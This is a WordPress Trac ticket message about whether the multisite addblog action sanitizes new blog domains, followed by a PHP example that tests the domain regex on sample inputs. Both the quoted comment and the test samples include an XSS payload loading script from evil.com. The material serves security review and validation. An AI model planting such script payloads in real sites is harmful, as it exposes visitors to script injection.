[wp-trac] [WordPress Trac] #11777: ms-edit.php / addblog action improperly sanitizes domains

WordPress Trac wp-trac at lists.automattic.com
Mon Mar 29 15:13:26 UTC 2010


#11777: ms-edit.php / addblog action improperly sanitizes domains
-------------------------------+--------------------------------------------
 Reporter:  Denis-de-Bernardy  |        Owner:  ryan    
     Type:  defect (bug)       |       Status:  reopened
 Priority:  normal             |    Milestone:  3.0     
Component:  Security           |      Version:  3.0     
 Severity:  normal             |   Resolution:          
 Keywords:  multisite          |  
-------------------------------+--------------------------------------------

Comment(by wpmuguru):

 Replying to [comment:7 Denis-de-Bernardy]:
 > Doesn't r13630 allow a completely unsanitized domain name to go in
 > provided it contains -- in it? Such as:
 >
 > {{{
 > evil--<script src="http://evil.com/xss.js"></script>
 > }}}

 It would block that. See line 139:
 {{{
 if ( ! preg_match( '/(--)/', $blog[ 'domain' ] ) && preg_match( '|^([a-zA-Z0-9-])+$|', $blog[ 'domain' ] ) )
 }}}

 The only characters allowed in the domain name are {{{a-zA-Z0-9-}}}.

-- 
Ticket URL: <http://core.trac.wordpress.org/ticket/11777#comment:9>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software
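The line-139 check discussed in the comment above, factored into a standalone function and run over constructed inputs (including the payload quoted in the reply). This is an added example, not WordPress code; the function name, the sample inputs and the use of \z instead of $ are assumptions of this example.

```php
<?php
// Added example (not WordPress code): the addblog domain check quoted in the
// comment above, factored into a function. $label stands for the candidate
// value of $blog['domain']. Function name and samples are assumptions.

function is_valid_blog_domain_label( $label ) {
    // Same two conditions as the quoted ms-edit.php line:
    // 1. reject any "--" sequence;
    if ( preg_match( '/--/', $label ) ) {
        return false;
    }
    // 2. allow only a-z, A-Z, 0-9 and "-" (at least one character).
    // \z is used instead of $ so a trailing newline cannot satisfy the anchor
    // (in PCRE, $ also matches just before a final "\n").
    if ( ! preg_match( '/^[a-zA-Z0-9-]+\z/', $label ) ) {
        return false;
    }
    return true;
}

// Constructed sample inputs with the expected verdict for each:
// a benign label, the payload quoted in the reply, a label containing "--",
// a full host name (dots are not in the allowed set), an empty string and a
// label with a trailing newline.
$samples = array(
    'myblog'                                               => true,
    'evil--<script src="http://evil.com/xss.js"></script>' => false,
    'evil--blog'                                           => false,
    'blog.example.com'                                     => false,
    ''                                                     => false,
    "myblog\n"                                             => false,
);

foreach ( $samples as $label => $expected ) {
    $result = is_valid_blog_domain_label( $label );
    printf( "%-60s %s\n", json_encode( $label ), $result === $expected ? 'ok' : 'MISMATCH' );
}
```

Every sample should print `ok`; a `MISMATCH` would mean the check no longer behaves as the comment describes.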